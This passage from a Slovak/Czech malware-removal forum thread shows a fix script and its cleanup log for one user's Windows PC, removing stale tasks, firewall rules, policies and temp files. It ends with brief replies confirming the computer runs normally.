FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp
U4 npcap_wifi; no ImagePath
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [] => [X]

EmptyTemp:
Hosts:
*****************

"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C0BFCA61-6769-4387-99FB-313A10D98354}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1F8EB603-5FF8-4688-8E08-79E2DA138F65}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{253B106F-1C56-48CB-B28D-46DB43BEB0D9}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => removed successfully
C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat => moved successfully
C:\Users\Tomika\AppData\Roaming\PureRef.ini => moved successfully
C:\Users\Tomika\AppData\Roaming\Setup.exe => moved successfully
C:\Users\Tomika\AppData\Local\.recently-used.xbel => moved successfully
C:\Users\Tomika\AppData\Local\oobelibMkey.log => moved successfully
C:\Users\Tomika\AppData\Local\recently-used.xbel => moved successfully
C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp => moved successfully
C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp => moved successfully
C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp => moved successfully
HKLM\System\CurrentControlSet\Services\npcap_wifi => removed successfully
npcap_wifi => service removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\wacom.com/WacomTabletPlugin => removed successfully
HKLM\Software\MozillaPlugins\wacom.com/WacomTabletPlugin => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C5600166-0D00-436C-9597-BB2E48267804}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5600166-0D00-436C-9597-BB2E48267804}" => removed successfully
C:\Windows\System32\Tasks\Adobe Flash Player Updater => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{67CAE894-9940-43DF-A154-A01C69C48B7F}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67CAE894-9940-43DF-A154-A01C69C48B7F}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{69904E5D-AA09-4F07-8269-73B550B28214}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69904E5D-AA09-4F07-8269-73B550B28214}" => removed successfully
C:\Windows\System32\Tasks\JavaUpdateSched => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JavaUpdateSched" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5DFEF0DB-1EC0-4858-9DE9-295F0928B552}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5DFEF0DB-1EC0-4858-9DE9-295F0928B552}" => removed successfully
C:\Windows\System32\Tasks\Adobe Acrobat Update Task => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Movie\Movie task" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0291BC3E-5758-4AE0-B583-887997C4F7E5}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0291BC3E-5758-4AE0-B583-887997C4F7E5}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{08667DDA-529A-4AE5-B93A-F3FB2AFB6863}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08667DDA-529A-4AE5-B93A-F3FB2AFB6863}" => removed successfully
C:\Windows\System32\Tasks\npcapwatchdog => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\npcapwatchdog" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{14E9279D-E202-421D-9345-9FF6FF65892A}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14E9279D-E202-421D-9345-9FF6FF65892A}" => removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => removed successfully
"HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GalaxyClient" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
Could not move "C:\Windows\System32\Drivers\etc\hosts" => Scheduled to move on reboot.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 26968937 B
Java, Flash, Steam htmlcache => 97261010 B
Windows/system/drivers => 1195803809 B
Edge => 0 B
Chrome => 1582336924 B
Firefox => 39723143 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 185878897 B
systemprofile32 => 185878897 B
LocalService => 185878897 B
NetworkService => 202326657 B
Tomika => 2668659464 B

RecycleBin => 64487530 B
EmptyTemp: => 6 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 26-10-2020 09:04:37)

C:\Windows\System32\Drivers\etc\hosts => Is moved successfully
Hosts restored successfully.

==== End of Fixlog 09:04:37 ====

Uživatelský avatar
Diallix
Rádce
Rádce
Příspěvky: 2760
Registrován: 27 dub 2008 10:34
Kontaktovat uživatele:

Re: Prosim o preventivnu kontrolu

#8 Příspěvek od Diallix »

Ako je na tom pocitac,?
Vyšla moja nová kniha BOTNETY! :173: Informácie o nej nájdete tu: >> BOTNETY <<

¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­
---
Obrázek Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << Obrázek
----
Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
Háveťárna - UPLOAD Malwaru: >> upload <<
---
Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.

Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky

imicro
Návštěvník
Návštěvník
Příspěvky: 83
Registrován: 08 led 2008 16:28

Re: Prosim o preventivnu kontrolu

#9 Příspěvek od imicro »

Pocitac je na tom dobre, v podstate ide ako predtym - ziadne problemy. Takze ak je to vsetko, tak dakujem za kontrolu :)

Uživatelský avatar
Diallix
Rádce
Rádce
Příspěvky: 2760
Registrován: 27 dub 2008 10:34
Kontaktovat uživatele:

Re: Prosim o preventivnu kontrolu

#10 Příspěvek od Diallix »

V pohode, nemate zac :]]
Vyšla moja nová kniha BOTNETY! :173: Informácie o nej nájdete tu: >> BOTNETY <<

¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­¯­­­
---
Obrázek Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << Obrázek
----
Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
Háveťárna - UPLOAD Malwaru: >> upload <<
---
Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.

Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky

Zamčeno